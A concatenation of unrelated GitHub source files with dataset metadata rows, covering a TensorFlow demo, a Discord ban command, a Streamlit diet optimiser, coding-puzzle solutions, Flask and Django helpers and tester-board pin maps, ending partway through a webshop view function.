image_batch, label_batch = tf.train.batch([image,label],batch_size=FLAGS.batch_size,num_threads=FLAGS.num_threads,capacity=FLAGS.capacity)
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.2)
config = tf.ConfigProto(gpu_options=gpu_options)
with tf.Session(config=config) as sess:
    # BUG FIX: the original ran sess.run(tf.local_variables_initializer())
    # *before* this `with` block, where `sess` did not exist yet (NameError).
    # The local-variable initializer (needed for the num_epochs counter of
    # slice_input_producer) must run inside the session instead.
    if FLAGS.num_epochs:
        sess.run(tf.local_variables_initializer())  # initialize num_epochs counter
    # start the queue-runner threads
    coord = tf.train.Coordinator()
    threads = tf.train.start_queue_runners(coord=coord)
    try:
        while not coord.should_stop():
            # get & process one batch
            images, labels = sess.run([image_batch, label_batch])
            for i in range(FLAGS.batch_size):
                print("label: %d" % labels[i])
                plt.imshow(images[i, :, :, :])
                plt.show()
            break  # demo: show a single batch only
    except tf.errors.OutOfRangeError:
        print("done!")  # input producer exhausted its epochs
    finally:
        coord.request_stop()
        coord.join(threads)
| changjiale3/machine-learning-codes | tensorflow/batch-images/batch-images2.py | batch-images2.py | py | 2,492 | python | en | code | 0 | github-code | 13 |
14092740561 | import discord
from discord.ext import commands
class Ban(commands.Cog):
    """Cog exposing the ban hybrid command."""
    # Command metadata -- presumably consumed by a help/loader system
    # elsewhere in the bot; confirm against the command registry.
    config = {
        "name": "ban",
        "desc": "ban member",
        "use": "ban @mention <reason>",
        "author": "Anh Duc(aki team)"
    }
    def __init__(self, bot):
        self.bot = bot
    @commands.hybrid_command()
    @commands.has_guild_permissions(ban_members=True)
    @commands.bot_has_guild_permissions(ban_members=True)
    @commands.cooldown(1, 4, commands.BucketType.user)
    async def ban(self, ctx: commands.Context, member: discord.Member, *, reason=None):
        """Ban `member` with an optional reason; both the invoker and the
        bot need the ban-members permission (4s per-user cooldown)."""
        await member.ban(reason=reason)
        await ctx.send(f"Banned {member}.")
async def setup(bot):
    """Extension entry point: register the Ban cog on the bot."""
    await bot.add_cog(Ban(bot))
| iotran207/Aki-bot | command/ban.py | ban.py | py | 707 | python | en | code | 4 | github-code | 13 |
14187571320 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
from pulp import *
import streamlit as st
import altair as alt
st.title('Raw Material Optimization')
# Fixed the typos in the displayed text from the original string
# ("igt", "chepest", "contraint nutrion requrement").
st.markdown('The concept was to use LP to find an optimal mix of raw ingredients to produce the cheapest meal bar while meeting some constraint nutrition requirements')
# In[2]:
# Import Nutrition Data (per-ingredient nutrition facts, ingredient as index)
st.header('Nutrition and Ingredient Costs Data ')
nutrition = pd.read_excel('Nutrition Facts.xlsx', index_col = 0)
# In[3]:
# Import Costs and build an ingredient -> cost lookup
costs = pd.read_excel('Costs.xlsx')
dict_costs = dict(zip(costs['Ingredients'], costs['Costs']))
# Display the two data tables side by side (toggled from the sidebar)
col3, col4 = st.columns(2)
with col3:
    if st.sidebar.checkbox('Nutrition Data'):
        st.write(nutrition)
with col4:
    if st.sidebar.checkbox('Costs Data'):
        st.write(costs)
# In[25]:
# Decision variables: candidate ingredients (quantities in grams)
variables = ['Chicken', 'Beef', 'Mutton', 'Rice', 'Wheat bran', 'Corn', 'Peanuts']
# Initialize the LP model: minimise total ingredient cost
model = LpProblem("Optimize your Protein Bar", LpMinimize)
# Create decision variables: a non-negative continuous quantity per ingredient
x = LpVariable.dicts("Qty", [j for j in variables],
                     lowBound=0, upBound=None, cat='continuous')
# Objective function: total cost of the mix
model += (lpSum([dict_costs[i] * x[i] for i in variables]))
# Constraints, driven by the sidebar widgets
with st.sidebar:
    st.sidebar.header("Meal Bar weight")
    # total weight must match the selected value exactly
    model += (lpSum([x[i] for i in variables])) == st.sidebar.number_input('Total weight', 100, 120)
    st.sidebar.header("Nutritional Fact")
    # fixed the 'Prtotien' -> 'Protein' typo in the widget label; also
    # removed the dead commented-out input() remnants from each line
    model += (lpSum([x[i] * nutrition.loc[i, 'Protein'] for i in variables])) >= st.sidebar.number_input('Protein range 0-20', 0, 20)  # protein min
    model += (lpSum([x[i] * nutrition.loc[i, 'Fat'] for i in variables])) <= st.sidebar.number_input('Fat range 0-22', 0, 22)  # fat max
    model += (lpSum([x[i] * nutrition.loc[i, 'Fibre'] for i in variables])) >= st.sidebar.number_input('Fiber range 0-6', 0, 6)  # fibre min
    model += (lpSum([x[i] * nutrition.loc[i, 'Salt'] for i in variables])) <= st.sidebar.number_input('Salt range 0-3', 0, 3)  # salt max
    model += (lpSum([x[i] * nutrition.loc[i, 'Sugar'] for i in variables])) <= st.sidebar.number_input('Sugar range 0-30', 0, 30)  # sugar max
# Solve Model
Mod_var=[]  # rows for the results table: one dict per decision variable
model.solve()
st.title('Cost Per Bar')
print("Cost per Bar = {:,} $".format(round(value(model.objective), 2)))
st.markdown(value(model.objective))
print('\n' + "Status: {}".format(LpStatus[model.status]))
# collect the optimal quantity of each ingredient
for v in model.variables():
    print(v.name, "=", round(v.varValue,2), 'g')
    Mod_var.append({'Status':v.name,'Optimal':round(v.varValue,2)})
#Mod_var.append(a)
a=pd.DataFrame(Mod_var)
# Add a title to the plot
st.title('Table and Bar chart for Optimal Ingredient in gm')
# Display the table and the graph in two columns
col1, col2 = st.columns(2)
with col1:
    st.write(a)
with col2:
    st.bar_chart(a.set_index('Status'))
| devd1808/devd1808 | New.py | New.py | py | 3,332 | python | en | code | 0 | github-code | 13 |
43262796692 | from bisect import bisect_left
from collections import defaultdict
def main():
    """Simulate Q moves on an H x W grid containing N wall cells.

    For every row/column the wall coordinates are kept sorted together with
    -1 / grid-size sentinels for the borders, so each move can be clipped
    against the nearest wall with one binary search (O(log N) per query).
    Note: wall_x is keyed by row index and stores column coordinates (and
    vice versa for wall_y).
    """
    wall_x = defaultdict(lambda: [-1, W])  # per-row walls + border sentinels
    wall_y = defaultdict(lambda: [-1, H])  # per-column walls + border sentinels
    for xi, yi in XY:
        wall_x[xi-1].append(yi-1)
        wall_y[yi-1].append(xi-1)
    for xi in wall_x:
        wall_x[xi] = sorted(wall_x[xi])
    for yi in wall_y:
        wall_y[yi] = sorted(wall_y[yi])
    x, y = SX-1, SY-1  # current position, 0-based
    for d, l in DL:
        # pick the wall list along the movement axis (w) and the coordinate
        # that changes (z): columns for L/R, rows for U/D
        l, w, z = int(l), wall_x[x], y
        if d in 'UD':
            w, z = wall_y[y], x
        idx = bisect_left(w, z)
        # clip the move at the nearest wall on either side:
        # w[idx-1] is the closest wall before z, w[idx] the closest after
        if d == 'L':
            y = max(y-l, w[idx-1] + 1)
        if d == 'R':
            y = min(y+l, w[idx] - 1)
        if d == 'U':
            x = max(x-l, w[idx-1] + 1)
        if d == 'D':
            x = min(x+l, w[idx] - 1)
        print(x+1, y+1)  # report the 1-based position after each move
    return
if __name__ == '__main__':
    # Input: grid size and start position, the wall list, then the queries
    H, W, SX, SY = map(int, input().split())
    N = int(input())
    XY = [list(map(int, input().split())) for _ in range(N)]
    Q = int(input())
    DL = [list(input().split()) for _ in range(Q)]
    main()
| Shirohi-git/AtCoder | abc271-/abc273_d.py | abc273_d.py | py | 1,059 | python | en | code | 2 | github-code | 13 |
74080582096 | import os
def color_table():
    """Print a demo table of ANSI text attributes and colour combinations.

    Escape format: \\033[<attr>;<fg>;<bg>m where attr selects brightness /
    underline / negative, fg is 30-37 and bg is 40-47.
    """
    print("\033[0;37;40m Normal text\n")
    print("\033[2;37;40m Underlined text\033[0;37;40m \n")
    print("\033[1;37;40m Bright Colour\033[0;37;40m \n")
    print("\033[3;37;40m Negative Colour\033[0;37;40m \n")
    print("\033[5;37;40m Negative Colour\033[0;37;40m\n")
    print("\033[1;37;40m \033[2;37:40m TextColour BlackBackground TextColour GreyBackground WhiteText ColouredBackground\033[0;37;40m\n")
    print("\033[1;30;40m Dark Gray \033[0m 1;30;40m \033[0;30;47m Black \033[0m 0;30;47m \033[0;37;41m Black \033[0m 0;37;41m")
    print("\033[1;31;40m Bright Red \033[0m 1;31;40m \033[0;31;47m Red \033[0m 0;31;47m \033[0;37;42m Black \033[0m 0;37;42m")
    print("\033[1;32;40m Bright Green \033[0m 1;32;40m \033[0;32;47m Green \033[0m 0;32;47m \033[0;37;43m Black \033[0m 0;37;43m")
    print("\033[1;33;40m Yellow \033[0m 1;33;40m \033[0;33;47m Brown \033[0m 0;33;47m \033[0;37;44m Black \033[0m 0;37;44m")
    print("\033[1;34;40m Bright Blue \033[0m 1;34;40m \033[0;34;47m Blue \033[0m 0;34;47m \033[0;37;45m Black \033[0m 0;37;45m")
    print("\033[1;35;40m Bright Magenta \033[0m 1;35;40m \033[0;35;47m Magenta \033[0m 0;35;47m \033[0;37;46m Black \033[0m 0;37;46m")
    print("\033[1;36;40m Bright Cyan \033[0m 1;36;40m \033[0;36;47m Cyan \033[0m 0;36;47m \033[0;37;47m Black \033[0m 0;37;47m")
    print("\033[1;37;40m White \033[0m 1;37;40m \033[0;37;40m Light Grey \033[0m 0;37;40m \033[0;37;48m Black \033[0m 0;37;48m")
def colour(col, bright=True, background="black"):
    """Build an ANSI escape code for the given foreground/background pair.

    `bright` may be a bool (or the strings "true"/"false" directly).
    """
    codes = {"black": 30, "red": 31, "green": 32, "yellow": 33,
             "blue": 34, "magenta": 35, "cyan": 36, "white": 37}
    # Normalise booleans (and 0/1, which compare equal to them -- hence the
    # deliberate `==` instead of `is`) to the string keys of the table below.
    if bright == True:
        bright = "true"
    if bright == False:
        bright = "false"
    intensity = {"true": 1, "false": 0}
    return "\033[%s;%s;%sm" % (intensity[bright], codes[col], codes[background] + 10)
class executer:
    """Base class for pluggable command executers used by the shell loop.

    Subclasses presumably override get()/get_linestat() and the event
    hooks; this base implementation returns canned defaults.
    """
    def __init__(self, name, desc, col):
        self.name = name
        self.description = desc
        self.col = col
        self.isCurrent = False  # whether this executer is the active one
    def get(self, command):
        """Return the executer's response text for `command`."""
        return "Default response to: %s\n"%command
    def get_linestat(self):
        """Return the prompt string shown before user input."""
        return "~$ "
    def getSelf(self):
        return self
    def eventOn(self):
        """Hook called when this executer becomes active (no-op by default)."""
        pass
    def eventOff(self):
        """Hook called when this executer is deactivated (no-op by default)."""
        pass
def base_interpereter(comm):
    """Handle the built-in shell commands (cd / help / exit / exec).

    Returns None when the command was fully handled here, a ("exec", arg)
    tuple when the caller should switch executers, or the normalised command
    string to be forwarded to the current executer.
    NOTE(review): the function name keeps the original spelling
    ("interpereter") since external callers rely on it.
    """
    comm = comm.strip().lower()
    if comm == "":
        return
    if comm[0:2] == "cd":
        if comm[3:7] == "home":
            # Windows-specific: expand "home" to the user's profile directory
            os.chdir("C:\\Users\\%s" %os.getlogin())
            comm = "cd %s" %comm[8::]
        try:
            # strip quotes so `cd "some path"` works
            os.chdir(comm[3::].replace("\"", ""))
            return
        except FileNotFoundError:
            print(colour("red", bright=False) + "The system cannot find the path specified.\n")
            return
    if comm.strip().lower() == "help":
        # NOTE(review): `help` shadows the builtin, but only locally
        help = "\n".join([colour("magenta", bright=False)+
        "help shows this message use \"help [commad]\" for more information",
        "exec change executer use \"exec list\" to view all",
        "NOTE: help is not build into all executers try \"help\" or \"/?\"",
        "\n"])
        print(help)
        return
    if comm.strip().lower() == "exit":
        print("%sexiting%s\n"%(colour("green", bright=False), colour("white", bright=False)))
        exit()
    if comm.strip()[0:4].lower() == "exec":
        arg = comm[5::].strip().lower()
        if arg == "":
            print("%sno argument specified\n"%colour("red", bright=False))
            return
        return ("exec", arg)
    return comm
if __name__ == '__main__':
    # quick smoke test of the exec command parsing
    base_interpereter("exec")
    base_interpereter("exec hello")
| JamesPerisher/better-cmd | base.py | base.py | py | 3,929 | python | en | code | 0 | github-code | 13 |
7847999714 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from pathlib_mate import Path
from .paths import DIR_AWS_TOOL_USER_DATA
from diskcache import Cache
PATH_CACHE_DIR = Path(DIR_AWS_TOOL_USER_DATA, ".cache")
class CustomCache(Cache):
    """diskcache.Cache with a read-through convenience helper."""

    # Sentinel so that legitimately-cached falsy/None values count as hits.
    _MISSING = object()

    def fast_get(self, key, callable, kwargs=None, expire=None):
        """Return the cached value for `key`; on a miss, compute it with
        `callable(**kwargs)`, store it (optionally with `expire` seconds)
        and return it.

        BUG FIX: the original used `self.get(key)` and treated any None as a
        miss, so cached None values were recomputed and re-stored on every
        call.  NOTE: the parameter name `callable` shadows the builtin, but
        is kept for backward compatibility with existing keyword callers.
        """
        value = self.get(key, default=self._MISSING)
        if value is self._MISSING:
            if kwargs is None:
                kwargs = {}
            value = callable(**kwargs)
            self.set(key, value, expire=expire)
        return value
cache = CustomCache(PATH_CACHE_DIR.abspath)
class CacheKeys:
    """Namespace of cache key names; after the loop below, every public
    attribute holds its own attribute name as a string."""
    aws_profile_list_from_config = None
    aws_profile_and_region_list_from_config = None


# Rewrite every public attribute so its value equals its own name.  The
# snapshot via list() avoids mutating the class __dict__ while iterating it.
for _key in list(CacheKeys.__dict__):
    if not _key.startswith("_"):
        setattr(CacheKeys, _key, _key)
| MacHu-GWU/afwf_aws_tools-project | aws_tools/cache.py | cache.py | py | 796 | python | en | code | 4 | github-code | 13 |
32930025079 | import jwt
import xlsxwriter
from flask import request, render_template
from models import User
from settings import app, celery
def token_required(f):
    """Decorator: run the view only when a valid 'jwt' cookie identifies a
    known user; otherwise render the login page."""
    from functools import wraps

    @wraps(f)  # keep f's name/docs so Flask endpoint names don't collide
    def decorated(*args, **kwargs):
        token = request.cookies.get('jwt')
        if token:
            data = jwt.decode(token, app.config['SECRET_KEY'], algorithms="HS256")
            user: User = User.select_from_database(User.username == data['username'])
            if user:
                return f(*args, **kwargs)
        # BUG FIX: the missing-cookie path previously fell through and
        # returned None (a Flask error); now both "no cookie" and "unknown
        # user" render the login page.
        # NOTE(review): jwt.decode still raises on an invalid/expired token,
        # unhandled here as before -- confirm whether that is desired.
        return render_template('login.html', message='Enter username and password')
    return decorated
@celery.task(name='create_excel', bind=True)
def create_excel(self, result):
    """Celery task: dump `result` (a list of apartment dicts) into
    apartments_divar.xlsx, one row per record.

    The first record's keys become the header row; `headers` maps each
    expected column name to its Excel column width.
    NOTE(review): the output path is fixed and overwritten on every run.
    """
    workbook = xlsxwriter.Workbook('apartments_divar.xlsx')
    worksheet = workbook.add_worksheet()
    headers = {'count': 10, 'meterage': 15, 'made_date': 15, 'rooms': 15,
               'size_of_land': 15, 'floors': 15, 'features': 20, 'price_per_meter': 15,
               'description': 50, 'total_price': 15, 'advertiser': 15, 'link': 30}
    for row_num, data in enumerate(result):
        if row_num == 0:
            # header row: write the column titles and set each column width
            [(worksheet.write(0, i, key), worksheet.set_column(i, i, headers[key])) for i, key in
             enumerate(list(data.keys()))]
        for cul_num, value in enumerate(data.values()):
            if isinstance(value, list):
                value = ''.join(value)  # flatten list fields into one cell
            worksheet.write(row_num + 1, cul_num, value)
    workbook.close()
| TBEhsanDev/scraping-divar-apartments-sell | utils.py | utils.py | py | 1,467 | python | en | code | 0 | github-code | 13 |
3864252475 | """ pin_assignments.py
Assign pins and pin properties
This file can ultimately be replaced with an external YAML file
See first occurrence of each type for setup details
Setup for Tester Baseboard revB
"""
# The pin map is built programmatically: the digital-input, digital-output,
# button/LED, ADC and DAC channels all follow regular patterns, so generating
# them removes ~700 lines of copy/paste while producing exactly the same
# dictionary (same keys, same per-entry fields, same insertion order).
# Irregular pins (the control port and the DUT analog channels) remain literal.
#
# Entry fields:
#   type       one of IO, ADC, DAC
#   device     hosting chip ('digital_0..2', 'control', 'analog_in0/1',
#              'analog_out0/1')
#   port/bit   IO expander port (0/1) and bit (0-7); ADC/DAC use 'bit' only
#   direction  IO only: 0=output, 1=input
#   polarity   IO only: 0=non-inverted, 1=inverted
#   init       initial value on reset (outputs only)
#   scale      ADC/DAC full-scale value ('vref' => returns raw input volts)
PIN_ASSIGNMENTS = {}

# 1st + 2nd tca9539 IO port expanders - 32 digital inputs (16 per chip).
for _ch in range(32):
    PIN_ASSIGNMENTS['din%d' % _ch] = {
        'comment': 'Digital input channel %d' % _ch,
        'type': 'IO',
        'device': 'digital_%d' % (_ch // 16),
        'port': (_ch // 8) % 2,
        'bit': _ch % 8,
        'direction': 1,
        'polarity': 0,
    }

# 3rd tca9539 IO port expander - 16 digital outputs.
for _ch in range(16):
    PIN_ASSIGNMENTS['dout%d' % _ch] = {
        'comment': 'Digital output channel %d' % _ch,
        'type': 'IO',
        'device': 'digital_2',
        'port': _ch // 8,
        'bit': _ch % 8,
        'direction': 0,
        'polarity': 0,
        'init': 0,
    }

# 4th tca9539 IO port expander, port 0 - control bits (irregular, literal).
PIN_ASSIGNMENTS.update({
    'nc_0': {  # channel 0 - not connected
        'comment': 'Digital control bit 0 - intentionally not connected',
        'type': 'IO', 'device': 'control', 'port': 0, 'bit': 0,
        'direction': 0, 'polarity': 0, 'init': 0,
    },
    'dut_power_enable_output': {  # channel 1
        'comment': 'DUT power enable',
        'type': 'IO', 'device': 'control', 'port': 0, 'bit': 1,
        'direction': 0, 'polarity': 0,  # non-inverted: set() to enable
        'init': 0,
    },
    'dut_current_limit_reset_output': {  # channel 2
        'comment': 'DUT current limit reset',
        'type': 'IO', 'device': 'control', 'port': 0, 'bit': 2,
        'direction': 0, 'polarity': 0,  # non-inverted: set() selects latched ALERT mode
        'init': 0,
    },
    'dut_current_limit_alert_input': {  # channel 3
        'comment': 'DUT current limit alert',
        'type': 'IO', 'device': 'control', 'port': 0, 'bit': 3,
        'direction': 1, 'polarity': 1,  # inverted: Over-current ALERT drives pin HIGH
        'init': 0,
    },
    'dut_board_loaded_input': {  # channel 4
        'comment': 'DUT loaded interlock signal from pogo board',
        'type': 'IO', 'device': 'control', 'port': 0, 'bit': 4,
        'direction': 1, 'polarity': 1, 'init': 0,
    },
    'control_uncommitted_0': {  # channel 5
        'comment': 'Uncommitted control bit 0',
        'type': 'IO', 'device': 'control', 'port': 0, 'bit': 5,
        'direction': 0, 'polarity': 0, 'init': 0,
    },
    'control_uncommitted_1': {  # channel 6
        'comment': 'Uncommitted control bit 1',
        'type': 'IO', 'device': 'control', 'port': 0, 'bit': 6,
        'direction': 0, 'polarity': 0, 'init': 0,
    },
    'nc_7': {  # channel 7 - not connected
        'comment': 'Digital control bit 7 - intentionally not connected',
        'type': 'IO', 'device': 'control', 'port': 0, 'bit': 7,
        'direction': 0, 'polarity': 0, 'init': 0,
    },
})

# Control port 1, channels 8-15: button/LED pairs (button on the even bit,
# its LED on the following odd bit).
for _n in range(1, 5):
    PIN_ASSIGNMENTS['button%d' % _n] = {
        'type': 'IO', 'device': 'control', 'port': 1,
        'bit': 2 * (_n - 1),
        'direction': 1, 'polarity': 1,
    }
    PIN_ASSIGNMENTS['led%d' % _n] = {
        'type': 'IO', 'device': 'control', 'port': 1,
        'bit': 2 * (_n - 1) + 1,
        'direction': 0, 'polarity': 1, 'init': 0,
    }

# #########################
# ### Analog Input Pins ###
# #########################
# Two adc128d818 converters: adc0-7 on analog_in0, adc8-13 on analog_in1.
for _ch in range(14):
    PIN_ASSIGNMENTS['adc%d' % _ch] = {
        'type': 'ADC',
        'device': 'analog_in%d' % (_ch // 8),
        'bit': _ch % 8,
        'scale': 'vref',  # full scale input returns Vref (i.e. input volts)
    }

# Dedicated DUT measurement channels on analog_in1.
PIN_ASSIGNMENTS['dut_scaled_voltage_input'] = {
    'comment': 'DUT scaled voltage input',
    'type': 'ADC', 'device': 'analog_in1', 'bit': 6,
    'scale': 27.05,  # set to read DUT scaled voltage as volts
}
PIN_ASSIGNMENTS['dut_scaled_current_input'] = {
    'comment': 'DUT scaled current input',
    'type': 'ADC', 'device': 'analog_in1', 'bit': 7,
    # 'scale': 'vref'  # set to read DUT current as true voltage
    'scale': 2.47,
    # 'scale': 13.5  # set to read DUT current as amps @ 24 volts input
}

# ##########################
# ### Analog Output Pins ###
# ##########################
# Two dac5574 converters; note the deliberately shuffled name -> channel map.
for _name, _comment, _device, _bit, _scale in (
        ('dac1', 'DAC channel 1', 'analog_out0', 0, 3.3),    # 0x4C, Vout A
        ('dac3', 'DAC channel 3', 'analog_out0', 1, 3.3),    # 0x4C, Vout B
        ('dac0', 'DAC channel 0', 'analog_out0', 2, 3.3),    # 0x4C, Vout C
        ('dut_current_limit_output',
         'DUT current limit output', 'analog_out0', 3, 2.47),  # 0x4C, Vout D (outputs in volts)
        ('dac2', 'DAC channel 2', 'analog_out1', 0, 3.3),    # 0x4F, Vout A
        ('dac5', 'DAC channel 5', 'analog_out1', 1, 3.3),    # 0x4F, Vout B
        ('dac4', 'DAC channel 4', 'analog_out1', 2, 3.3),    # 0x4F, Vout C
        ('dac_nc',
         'DAC channel intentionally not connected', 'analog_out1', 3, 3.3),  # 0x4F, Vout D
):
    PIN_ASSIGNMENTS[_name] = {
        'comment': _comment,
        'type': 'DAC',
        'device': _device,
        'bit': _bit,
        'scale': _scale,  # value for full scale output
    }
# Do Not Delete
if __name__ == "__main__":
    # This module is pure data; running it directly is a mistake.
    # BUG FIX: corrected "pin_assigmnents" typo in the message.
    print("Tried to execute pin_assignments - EXITING")
| synthetos/TestCode | code/pin_assignments.py | pin_assignments.py | py | 19,571 | python | en | code | 0 | github-code | 13 |
24534341590 | from ds_templates import test_series
from test_cases import cases
"""
First check if the list is UNrotated (nums[0] < nums[-1] or len(nums) == 1). Otherwise use a binary search to search
for the condition where nums[i] < nums[i-1]. This signifies the loop in the list, and the value nums[i] should be
returned. You should never run into an index error with this algorithm b/c the only index where that would occur is on
the first element. The binary search will never reach the first element because of the upfront test to see if it's an
unrotated list.
[4, 5, 6, 7, 8, 9, 10, 1, 2, 3]
[9, 10, 1, 2, 3, 4, 5, 6, 7, 8]
[4, 5, 6, 7, 8, 9, 10, 1, 2, 3]
"""
def find_min(nums: list[int]) -> int:
    """Return the smallest element of a rotated, ascending-sorted list.

    An unrotated list starts at its minimum, so that case is answered
    directly; otherwise a binary search locates the rotation point, i.e.
    the single index where nums[i] < nums[i - 1].
    """
    if len(nums) == 1 or nums[0] < nums[-1]:
        return nums[0]
    lo, hi = 0, len(nums) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if nums[mid] < nums[mid - 1]:
            # Found the drop-off: nums[mid] is the minimum.
            return nums[mid]
        if nums[mid] < nums[0]:
            hi = mid - 1  # minimum lies in the left half
        else:
            lo = mid + 1  # minimum lies in the right half
    return nums[lo]
# Run the shared test harness over the bundled cases when this module executes.
test_series.test_series(find_min, cases)
| Hintzy/leetcode | Medium/153_find_min_in_rotated_sorted_array/find_min_rs_array.py | find_min_rs_array.py | py | 1,063 | python | en | code | 0 | github-code | 13 |
7988366604 | """
URL configuration for app project.
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/4.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from . import views
# URL table: every route maps directly to a function-based view in views.py.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.index),  # site root shows the index page
    path('about/', views.about),
    path('player/', views.player),
    path('contact/', views.contact),
    path('index/', views.index),  # explicit alias for the root page
    path('course/', views.course),
    path('calculator/', views.calculator),
    path('marksheet/', views.marksheet),
    path('fruit/', views.fruit),
    path('evenodd/', views.evenodd),
    path('playerdetail/',views.playerdetail),
    # path('course/<int:courseid>',views.coursesDetails) # Dynamic url int
    # path('course/<str:courseid>', views.coursesDetails) # Dynamic url str
    # path('course/<slug:courseid>', views.coursesDetails) # Dynamic url slug
    #path('course/<courseid>', views.coursesDetails) # Dynamic url NONE Type
]
| AditySuraj77/Django_Concept | app/app/urls.py | urls.py | py | 1,493 | python | en | code | 0 | github-code | 13 |
38587033317 | from django.shortcuts import render
from django.db import connection
from django.http import Http404
from frankie_web_platform import settings
from webshop.models import *
from django.test.client import RequestFactory
from django.http import JsonResponse
def get_selected_parameters_values(request) -> {int: [int]}:
    """Collect every non-price GET parameter as {'id': <param>, 'values': [...]}.

    Keys and their (multi-)values are converted to int; the reserved
    price_from/price_to keys are skipped.
    """
    selected = []
    for name in request.GET:
        if name in ('price_from', 'price_to'):
            continue
        numeric_values = [int(raw) for raw in request.GET.getlist(name)]
        selected.append({'id': int(name), 'values': numeric_values})
    return selected
def get_selected_parameters(request) -> [int]:
    """Return the ids (keys) of all non-price GET parameters, as ints."""
    return [int(name) for name in request.GET
            if name not in ('price_from', 'price_to')]
def get_selected_values(request) -> [int]:
    """Return the value of every non-price GET parameter, as ints.

    Note: ``items()`` yields one value per key, so multi-valued parameters
    contribute a single entry.
    """
    return [int(raw) for name, raw in request.GET.items()
            if name not in ('price_from', 'price_to')]
def get_price(request) -> (float, float):
    """Extract the optional price_from/price_to GET parameters as floats.

    Either element of the returned tuple is None when its parameter is absent.
    """
    price_from = None
    price_to = None
    for name, raw in request.GET.items():
        if name == 'price_from':
            price_from = float(raw)
        elif name == 'price_to':
            price_to = float(raw)
    return price_from, price_to
def list_to_sql_array(value: list) -> str:
    """Render *value* as a parenthesised SQL IN-list, e.g. [1, 2] -> "(1, 2)".

    Items are interpolated verbatim, so callers must only pass trusted
    (already int()-converted) data.  BUG FIX: an empty list now yields "()"
    instead of raising IndexError on the ``value[-1]`` access.
    """
    return "(" + ", ".join(str(item) for item in value) + ")"
def check_if_param_in_params(param: int, params: [{}]) -> bool:
    """Return True when any entry in *params* has 'id' == *param*.

    BUG FIX: always returns a real bool now; the original returned None
    (not False, despite the ``-> bool`` annotation) on a miss.
    """
    return any(entry['id'] == param for entry in params)
def check_if_value_in_values(value: int, param: int, params: [{}]) -> bool:
    """Return True when the entry for *param* lists *value* in its 'values'.

    BUG FIX: always returns a real bool now; the original returned None
    (not False, despite the ``-> bool`` annotation) on a miss.
    """
    return any(entry['id'] == param and value in entry['values'] for entry in params)
def get_filter_from_query(selected, parameters):
    """Build the filter-sidebar structure from parameter/value rows.

    *parameters* rows follow the SELECT in catalogue_category_filter:
    (param_id, param_name, first_image, second_image, weight,
     val_id, value, val_first_image, val_second_image, val_weight, count).
    *selected* is the output of get_selected_parameters_values(); a value is
    marked 'checked' when it appears there.

    Returns a list of (param_name, data) pairs sorted by parameter weight.
    NOTE(review): the inner loop rebuilds each parameter's value list once
    per row of that parameter (O(n^2)); the final content is the same each
    time, only redundant work - candidate for a single-pass rewrite.
    """
    filter_structure = {}
    for parameter in parameters:
        # (Re)create the entry for this parameter name, keyed by name.
        filter_structure[parameter[1]] = {'first_image': parameter[2],
                                          'second_image': parameter[3],
                                          'weight': parameter[4],
                                          'id': parameter[0],
                                          }
        filter_structure[parameter[1]]['values'] = []
        # Collect every value row belonging to the same parameter name.
        for param in parameters:
            if param[1] == parameter[1]:
                if check_if_param_in_params(param[0], selected):
                    if check_if_value_in_values(param[5], param[0], selected):
                        filter_structure[parameter[1]]['values'].append({'value': param[6],
                                                                         'first_image': param[7],
                                                                         'second_image': param[8],
                                                                         'weight': param[9],
                                                                         'id': param[5],
                                                                         'count': param[10],
                                                                         'checked': True})
                    else:
                        filter_structure[parameter[1]]['values'].append({'value': param[6],
                                                                         'first_image': param[7],
                                                                         'second_image': param[8],
                                                                         'weight': param[9],
                                                                         'id': param[5],
                                                                         'count': param[10],
                                                                         'checked': False})
                else:
                    filter_structure[parameter[1]]['values'].append({'value': param[6],
                                                                     'first_image': param[7],
                                                                     'second_image': param[8],
                                                                     'weight': param[9],
                                                                     'id': param[5],
                                                                     'count': param[10],
                                                                     'checked': False})
    # Present the parameters in ascending weight order.
    filter_structure = sorted(filter_structure.items(), key=lambda x: x[1]['weight'])
    return filter_structure
def get_correctors_for_product(all_correctors, product_id):
    """Return the corrector rows whose product id (column 1) matches."""
    return [row for row in all_correctors if row[1] == product_id]
def get_products(filtered_products, order: str):
    """Aggregate raw product rows into per-product dicts and sort them.

    *filtered_products* rows follow the numbered SELECT columns built in
    filter_products / catalogue_category_filter (0=id, 1=name, 5=default
    price, 14..19=image columns, 21=sale percent, 24=margin percent, 28=date
    added, ...).  One product may span several rows (one per image/parameter
    join); rows are de-duplicated by product id.

    Returns (products, products_ids) where products is a list of
    (product_id, data) pairs sorted per *order*; raises Http404 for an
    unknown *order*.
    """
    conn = connection
    cur = conn.cursor()
    # All price-corrector rows, fetched once and matched per product below.
    all_correctors = cur.execute("SELECT "
                                 "ppc.id, "
                                 "ppc.product_id, "
                                 "(ppc.new_price * prov.coefficient) as new_price, "
                                 "ppc.name FROM product_price_correctors "
                                 "AS ppc "
                                 "JOIN products AS prod ON ppc.product_id = prod.id "
                                 "JOIN providers AS prov ON prod.provider_id = prov.id").fetchall()
    products = {}
    products_ids = []
    img_ids = []
    for product in filtered_products:
        # Apply sale discount (col 21) and margin markup (col 24) on top of
        # the provider-adjusted default price (col 5).
        default_price = product[5]
        default_price_new = product[5]
        if product[21] is not None:
            default_price_new = default_price - default_price / 100 * product[21]
        if product[24] is not None:
            default_price_new += default_price / 100 * product[24]
        correctors = []
        images = []
        if product[0] in products:
            # Repeat row for a known product: keep the lists built so far.
            correctors = products[product[0]]['price_correctors']
            images = products[product[0]]['images']
        products[product[0]] = {'name': product[1],
                                'code': product[2],
                                'url': product[3],
                                'weight': product[4],
                                'default_new_price': default_price_new,
                                'default_price': default_price,
                                'description': product[7],
                                'mass': product[8],
                                'is_new': product[9],
                                'is_top': product[10],
                                'images': images,
                                'price_correctors': correctors,
                                'sale_name': product[22],
                                'sale_image': product[23],
                                'date_on_add': product[28]}
        if product[0] not in products_ids:
            products_ids.append(product[0])
